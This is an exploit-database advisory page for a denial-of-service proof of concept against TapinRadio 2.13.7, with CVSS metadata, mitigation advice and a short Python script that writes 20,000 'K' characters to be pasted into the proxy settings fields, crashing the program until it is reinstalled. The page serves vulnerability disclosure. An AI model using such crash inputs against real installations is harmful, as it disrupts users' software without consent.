TapinRadio 2.13.7 - Denial of Service (PoC)

vendor:

TapinRadio

by:

Ismael Nava

7.5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: TapinRadio

Affected Version From: 2.13.7

Affected Version To: 2.13.7

Patch Exists: YES

Related CWE: N/A

CPE: a:raimersoft:tapinradio:2.13.7

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Home x64

2020

TapinRadio 2.13.7 – Denial of Service (PoC)

TapinRadio 2.13.7 is vulnerable to Denial of Service attack. An attacker can create a new .txt file with a buffer of 20000 'K' characters and paste the content in the field Username and Address in the Preferences option of the program. After clicking in OK, the program will crash and the user will need to uninstall and install again the program.

Mitigation:

Update to the latest version of TapinRadio

Source

Exploit-DB raw data:

# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC)
# Date: 2020-05-12
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Version: 2.13.7 x64
# Tested on: Windows 10 Home x64

#STEPS
# Open the program TapinRadio 
# In Settings select Preferences option
# Click in Miscellaneous and click in Set Application Proxy
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Mikon.txt"
# Paste the content in the field Username and Address and click in OK
# Click in Ok again
# After TapinRadio closed, the program did not work again if the user try to open again, so it is necessary uninstall and install again
# End :)


buffer = 'K' * 20000

try: 
    file = open("Mikon.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")